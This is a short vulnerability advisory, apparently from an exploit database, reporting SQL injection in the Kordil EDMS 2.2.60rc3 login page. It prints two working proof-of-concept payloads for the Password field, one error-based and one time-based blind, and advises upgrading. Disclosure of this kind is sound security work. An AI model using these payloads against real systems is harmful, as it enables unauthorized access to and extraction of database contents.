vendor:
Kordil EDMS
by:
Woody Hughes
5,5
CVSS
(AV:R/AC:L/Au:R/C:C/I:C/A:N/B:/E:P/RL:U/RC:C)
SQL Injection Vulnerability
89
CWE
Product Name: Kordil EDMS
Affected Version From: 2.2.60rc3
Affected Version To: 2.2.60rc3
Patch Exists: YES
Related CWE: N/A
CPE: a:kordil:kordil_edms
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: Ubuntu Linux
2012
Kordil EDMS v2.2.60rc3 SQL Injection Vulnerability
Ingress Security has found multiple SQL injection vulnerabilities in the Kordil EDMS software. Proof of Concept: URL: http://localhost/kordil/global_group_login.php Type: Error-based Payload: User=admin&Password=12345' AND EXTRACTVALUE(1299,CONCAT(0x5c,0x3a6a6f793a,(SELECT (CASE WHEN (1299=1299) THEN 1 ELSE 0 END)),0x3a6a77683a)) AND 'hax'='hax&act=n&QS_Submit=Submit URL: http://localhost/kordil/global_group_login.php Type: Blind - Time-based Payload: User=admin&Password=12345' AND SLEEP(5) AND 'hax'='hax&act=n&QS_Submit=Submit
Mitigation:
Upgrade to the latest version of Kordil EDMS.